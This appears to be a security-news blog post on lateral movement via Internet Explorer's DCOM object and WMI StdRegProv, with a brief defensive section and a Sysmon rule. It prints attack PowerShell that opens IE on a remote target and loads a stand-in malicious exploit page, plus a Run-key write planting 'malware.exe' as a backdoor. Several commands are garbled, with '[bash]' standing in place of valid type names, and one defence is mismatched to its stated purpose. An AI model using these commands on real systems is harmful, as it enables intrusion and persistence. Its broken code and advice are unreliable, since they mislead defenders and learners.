Lateral Movement Using Internet Explorer DCOM Object and StdRegProv

By /

Listen to this Post

Lateral movement is a critical phase in cyber attacks, allowing adversaries to traverse a network after initial compromise. One advanced technique involves leveraging the Internet Explorer DCOM (Distributed Component Object Model) object and the StdRegProv WMI class to execute code remotely and manipulate registry keys.

You Should Know:

1. Understanding DCOM and Internet Explorer Exploitation

DCOM enables communication between software components across networked devices. Attackers abuse this feature to execute malicious code remotely via Internet Explorer’s COM interface.

Exploitation Command (via PowerShell):

$com = [bash]::CreateInstance([bash]::GetTypeFromProgID("InternetExplorer.Application", "TARGET_IP"))
$com.Visible = $true  Triggers IE visibility (optional for stealth)
$com.Navigate2("http://malicious-site.com/exploit.html")

2. Leveraging StdRegProv for Registry Manipulation

The StdRegProv WMI class allows attackers to query, modify, or delete registry keys remotely, aiding persistence or privilege escalation.

Example: Enumerating Registry Keys

Get-WmiObject -Namespace "root\default" -Class StdRegProv -ComputerName "TARGET_IP" -List

Modifying a Registry Key (Persistence):

$reg = [bash]"\TARGET_IP\root\default:StdRegProv" 
$reg.SetStringValue(2147483650, "Software\Microsoft\Windows\CurrentVersion\Run", "Backdoor", "C:\malware.exe")

3. Defensive Measures (Blue Team)

  • Restrict DCOM Access:
    Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Ole" -Name "EnableDCOM" -Value "N"
  • Monitor WMI Activity:
    Get-WinEvent -LogName "Microsoft-Windows-WMI-Activity/Operational" | Where-Object {$_.ID -eq 5861}
  • Block Suspicious Registry Edits via GPO:
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "RestrictAnonymous" /t REG_DWORD /d 1 /f

4. Detection with Sysmon (Example Rule)

<RuleGroup name="DCOM Abuse" groupRelation="or"> 
<ProcessCreate onmatch="include"> 
<CommandLine condition="contains">InternetExplorer.Application</CommandLine> 
</ProcessCreate> 
</RuleGroup>

What Undercode Say:

Lateral movement via DCOM and WMI is stealthy but leaves traces. Defenders must:
– Audit WMI/DCOM permissions.
– Log registry modifications (reg query /v "KeyPath" /s).
– Use Sysinternals tools (procmon.exe for real-time monitoring).
– Restrict WinRM/PowerShell remoting (Disable-WSManCredSSP -Role Server).

Expected Output:

A hardened network where DCOM/WMI misuse triggers alerts, and registry changes are logged for forensic analysis.

Reference:

References:

Reported By: Florian Hansemann – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Related Posts: